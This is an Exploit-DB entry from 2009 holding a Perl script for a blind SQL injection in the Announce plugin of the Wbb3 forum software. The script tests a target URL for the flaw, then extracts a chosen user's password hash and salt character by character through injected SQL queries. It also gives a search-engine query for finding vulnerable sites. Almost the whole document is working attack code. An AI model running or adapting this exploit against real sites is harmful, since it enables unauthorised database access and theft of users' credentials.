Wbb3 - Blind SQL Injection

EDB-ID:

10632

CVE:

N/A

Author:

molli

Type:

webapps

Platform:

PHP

Published:

2009-12-24

#!/usr/bin/perl -w

use strict;
use LWP::Simple;

$| = 1;

print q{
-----------------------------------------------
Wbb3 Blind Sql Injection
Injection in Announce Plugin (Kleinanzeigen Markt)
Coded By Molli
use: ano.pl [url] [user id] [Announce Catid]
Google: "inurl:index.php?page=Announceshow"

Special greetz to:
B0nzai
&
Strike
-----------------------------------------------
};
if (@ARGV < 3) {
 print "Usage: ano.pl [url] [user id] [Announce CatID] \nExample: ano.pl www.target.com 1 1\n";
 exit;
}

my $url = shift;
my $uid  = shift;
my $annid  = shift;
my $prefix;

my @charset = ('a','b','c','d','e','f','1','2','3','4','5','6','7','8','9','0');

print "Check if Vulnerable....\n";
my $chreq = get("http://".$url."/index.php?page=AnnounceShow&catID=1'");
#print $chreq;
if (($chreq =~ m/Fatal error/i) || ($chreq =~ m/Invalid SQL/i)) 
	{
		print "Vulnerable!\n";
	} 
		else 
		{
			print "Patched!\n";
			exit;
		}

print "Checking Prefix\n";
if ($chreq =~ m/_wcf/i) 
	{
		print "Found Prefix '$1'\n";
		$prefix = $1;
	} 
		else 
		{
			print "Can't find prefix, using 'wcf1_'\n";
			$prefix = "wcf1_";
		}
print "Exploiting...\n";
print "Hash: ";

my $counter = 1;
my $countersalt = 1;
while($counter < 41) 
		{
			foreach(@charset) 
				{
					my $ascode       = ord($_);
					my $result       = get("http://".$url."/index.php?page=AnnounceShow&catID=".$annid."/**/AND/**/ascii(substring((SELECT/**/password/**/FROM/**/".$prefix."user/**/WHERE/**/userid=".$uid."),".$counter."))=".$ascode."");
					if (length($result) != 0) 
						{
							if ($result =~ "keine") 
								{
								}
									else
										{
											print chr($ascode);
											$counter++;
										}
						}
				}
		}

		
my $saltcheck = get("http://".$url."/index.php?page=AnnounceShow&catID=".$annid."/**/AND/**/ascii(substring((SELECT/**/salt/**/FROM/**/".$prefix."user/**/WHERE/**/userid=".$uid."),1))>0");
if($saltcheck =~ "keine")
		{
		}
			else
			{
				print "\nSalt: ";
				while($countersalt < 41) 
					{
						foreach(@charset) 
							{
								my $ascodesalt       = ord($_);
								my $resultsalt       = get("http://".$url."/index.php?page=AnnounceShow&catID=".$annid."/**/AND/**/ascii(substring((SELECT/**/salt/**/FROM/**/".$prefix."user/**/WHERE/**/userid=".$uid."),".$countersalt."))=".$ascodesalt."");
								if (length($resultsalt) != 0) 
									{
										if ($resultsalt =~ "keine") 
											{
											}
												else
													{
														print chr($ascodesalt);
														$countersalt++;
													}
									}
							}
					}
			}
print "\nDone! Exploit by molli\n";